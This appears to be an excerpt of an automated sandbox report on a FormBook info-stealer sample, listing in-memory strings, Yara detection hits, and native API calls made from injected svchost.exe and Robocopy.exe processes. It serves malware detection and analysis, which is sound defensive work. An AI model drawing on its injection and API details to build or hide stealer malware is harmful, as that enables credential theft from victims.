            Source: HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: Robocopy.exe, 00000004.00000002.3985211901.0000000002D4F000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3985211901.0000000002D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: Robocopy.exe, 00000004.00000002.3985211901.0000000002D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: Robocopy.exe, 00000004.00000002.3985211901.0000000002D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: Robocopy.exe, 00000004.00000002.3985211901.0000000002D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: Robocopy.exe, 00000004.00000002.3985211901.0000000002D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033L
            Source: Robocopy.exe, 00000004.00000002.3985211901.0000000002D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: Robocopy.exe, 00000004.00000002.3985211901.0000000002D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: Robocopy.exe, 00000004.00000003.2452211637.00000000079A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.register.com/whois.rcmx?domainName=Alphaaistore.com

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3984885805.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2272902332.0000000000C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3985113849.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3986045977.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2275425308.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3986013036.0000000002C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3984885805.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2272902332.0000000000C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3985113849.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3986045977.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2275425308.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3986013036.0000000002C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042CE13 NtClose,2_2_0042CE13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk,2_2_030735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B60 NtClose,LdrInitializeThunk,2_2_03072B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03072DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074340 NtSetContextThread,2_2_03074340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073010 NtOpenDirectoryObject,2_2_03073010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073090 NtSetValueKey,2_2_03073090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074650 NtSuspendThread,2_2_03074650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B80 NtQueryInformationFile,2_2_03072B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BA0 NtEnumerateValueKey,2_2_03072BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BE0 NtQueryValueKey,2_2_03072BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BF0 NtAllocateVirtualMemory,2_2_03072BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AB0 NtWaitForSingleObject,2_2_03072AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AD0 NtReadFile,2_2_03072AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AF0 NtWriteFile,2_2_03072AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030739B0 NtGetContextThread,2_2_030739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F30 NtCreateSection,2_2_03072F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F60 NtCreateProcessEx,2_2_03072F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F90 NtProtectVirtualMemory,2_2_03072F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FA0 NtQuerySection,2_2_03072FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FB0 NtResumeThread,2_2_03072FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FE0 NtCreateFile,2_2_03072FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E30 NtWriteVirtualMemory,2_2_03072E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E80 NtReadVirtualMemory,2_2_03072E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EA0 NtAdjustPrivilegesToken,2_2_03072EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EE0 NtQueueApcThread,2_2_03072EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D00 NtSetInformationFile,2_2_03072D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D10 NtMapViewOfSection,2_2_03072D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D10 NtOpenProcessToken,2_2_03073D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D30 NtUnmapViewOfSection,2_2_03072D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D70 NtOpenThread,2_2_03073D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DB0 NtEnumerateKey,2_2_03072DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DD0 NtDelayExecution,2_2_03072DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C00 NtQueryInformationProcess,2_2_03072C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C60 NtCreateKey,2_2_03072C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C70 NtFreeVirtualMemory,2_2_03072C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CA0 NtQueryInformationToken,2_2_03072CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CC0 NtQueryVirtualMemory,2_2_03072CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CF0 NtOpenProcess,2_2_03072CF0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048335C0 NtCreateMutant,LdrInitializeThunk,4_2_048335C0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04834650 NtSuspendThread,LdrInitializeThunk,4_2_04834650
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04834340 NtSetContextThread,LdrInitializeThunk,4_2_04834340
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_04832CA0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832C60 NtCreateKey,LdrInitializeThunk,4_2_04832C60
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04832C70
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832DD0 NtDelayExecution,LdrInitializeThunk,4_2_04832DD0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_04832DF0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832D10 NtMapViewOfSection,LdrInitializeThunk,4_2_04832D10
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_04832D30
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_04832E80
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832EE0 NtQueueApcThread,LdrInitializeThunk,4_2_04832EE0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832FB0 NtResumeThread,LdrInitializeThunk,4_2_04832FB0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832FE0 NtCreateFile,LdrInitializeThunk,4_2_04832FE0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832F30 NtCreateSection,LdrInitializeThunk,4_2_04832F30
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048339B0 NtGetContextThread,LdrInitializeThunk,4_2_048339B0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832AD0 NtReadFile,LdrInitializeThunk,4_2_04832AD0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832AF0 NtWriteFile,LdrInitializeThunk,4_2_04832AF0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_04832BA0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832BE0 NtQueryValueKey,LdrInitializeThunk,4_2_04832BE0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04832BF0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832B60 NtClose,LdrInitializeThunk,4_2_04832B60
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04833090 NtSetValueKey,4_2_04833090
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04833010 NtOpenDirectoryObject,4_2_04833010
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832CC0 NtQueryVirtualMemory,4_2_04832CC0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832CF0 NtOpenProcess,4_2_04832CF0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832C00 NtQueryInformationProcess,4_2_04832C00
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832DB0 NtEnumerateKey,4_2_04832DB0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832D00 NtSetInformationFile,4_2_04832D00
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04833D10 NtOpenProcessToken,4_2_04833D10
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04833D70 NtOpenThread,4_2_04833D70
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832EA0 NtAdjustPrivilegesToken,4_2_04832EA0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832E30 NtWriteVirtualMemory,4_2_04832E30
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832F90 NtProtectVirtualMemory,4_2_04832F90
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832FA0 NtQuerySection,4_2_04832FA0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832F60 NtCreateProcessEx,4_2_04832F60
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832AB0 NtWaitForSingleObject,4_2_04832AB0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832B80 NtQueryInformationFile,4_2_04832B80
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_00829450 NtCreateFile,4_2_00829450
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008295C0 NtReadFile,4_2_008295C0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008296C0 NtDeleteFile,4_2_008296C0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_00829770 NtClose,4_2_00829770
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008298E0 NtAllocateVirtualMemory,4_2_008298E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418D032_2_00418D03
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011E02_2_004011E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402A5C2_2_00402A5C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402A602_2_00402A60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042F4632_2_0042F463
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004034152_2_00403415
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004034202_2_00403420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041052A2_2_0041052A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004105332_2_00410533
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416EE32_2_00416EE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004107532_2_00410753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027002_2_00402700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E7D32_2_0040E7D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F132D2_2_030F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D34C2_2_0302D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA3522_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0308739A2_2_0308739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F02_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031003E62_2_031003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E02742_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030452A02_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B2C02_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030301002_2_03030100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA1182_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C81582_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307516C2_2_0307516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F1722_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B16B2_2_0310B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304B1B02_2_0304B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031001AA2_2_031001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F81CC2_2_030F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF0CC2_2_030EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C02_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F70E92_2_030F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF0E02_2_030FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030647502_2_03064750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030407702_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF7B02_2_030FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C02_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F16CC2_2_030F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C6E02_2_0305C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030405352_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F75712_2_030F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031005912_2_03100591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DD5B02_2_030DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF43F2_2_030FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F24462_2_030F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030314602_2_03031460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EE4F62_2_030EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB402_2_030FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFB762_2_030FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FB802_2_0305FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F6BD72_2_030F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B5BF02_2_030B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307DBF92_2_0307DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFA492_2_030FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7A462_2_030F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B3A6C2_2_030B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA802_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DDAAC2_2_030DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03085AA02_2_03085AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EDAC62_2_030EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030499502_2_03049950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B9502_2_0305B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030569622_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A02_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310A9A62_2_0310A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD8002_2_030AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030428402_2_03042840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304A8402_2_0304A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030268B82_2_030268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030438E02_2_030438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E8F02_2_0306E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFF092_2_030FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03082F282_2_03082F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060F302_2_03060F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4F402_2_030B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041F922_2_03041F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFFB12_2_030FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032FC82_2_03032FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304CFE02_2_0304CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEE262_2_030FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040E592_2_03040E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052E902_2_03052E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FCE932_2_030FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03049EB02_2_03049EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEEDB2_2_030FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304AD002_2_0304AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043D402_2_03043D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F1D5A2_2_030F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7D732_2_030F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03058DBF2_2_03058DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FDC02_2_0305FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303ADE02_2_0303ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040C002_2_03040C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B9C322_2_030B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0CB52_2_030E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030CF22_2_03030CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFCF22_2_030FFCF2
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_047F14604_2_047F1460
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048AE4F64_2_048AE4F6
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BF43F4_2_048BF43F
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048B24464_2_048B2446
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048C05914_2_048C0591
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0489D5B04_2_0489D5B0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048005354_2_04800535
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048B75714_2_048B7571
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048B16CC4_2_048B16CC
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0481C6E04_2_0481C6E0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BF7B04_2_048BF7B0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_047FC7C04_2_047FC7C0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048247504_2_04824750
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048007704_2_04800770
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048070C04_2_048070C0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048AF0CC4_2_048AF0CC
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048B70E94_2_048B70E9
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BF0E04_2_048BF0E0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_047EF1724_2_047EF172
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048C01AA4_2_048C01AA
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0480B1B04_2_0480B1B0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048B81CC4_2_048B81CC
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_047F01004_2_047F0100
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0489A1184_2_0489A118
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048CB16B4_2_048CB16B
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0483516C4_2_0483516C
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048052A04_2_048052A0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0481B2C04_2_0481B2C0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048A12ED4_2_048A12ED
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048A02744_2_048A0274
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0484739A4_2_0484739A
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_047ED34C4_2_047ED34C
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048C03E64_2_048C03E6
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0480E3F04_2_0480E3F0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048B132D4_2_048B132D
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BA3524_2_048BA352
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048A0CB54_2_048A0CB5
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BFCF24_2_048BFCF2
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04800C004_2_04800C00
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_047F0CF24_2_047F0CF2
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04879C324_2_04879C32
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04818DBF4_2_04818DBF
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0481FDC04_2_0481FDC0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0480AD004_2_0480AD00
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_047FADE04_2_047FADE0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04803D404_2_04803D40
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048B1D5A4_2_048B1D5A
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048B7D734_2_048B7D73
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04812E904_2_04812E90
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BCE934_2_048BCE93
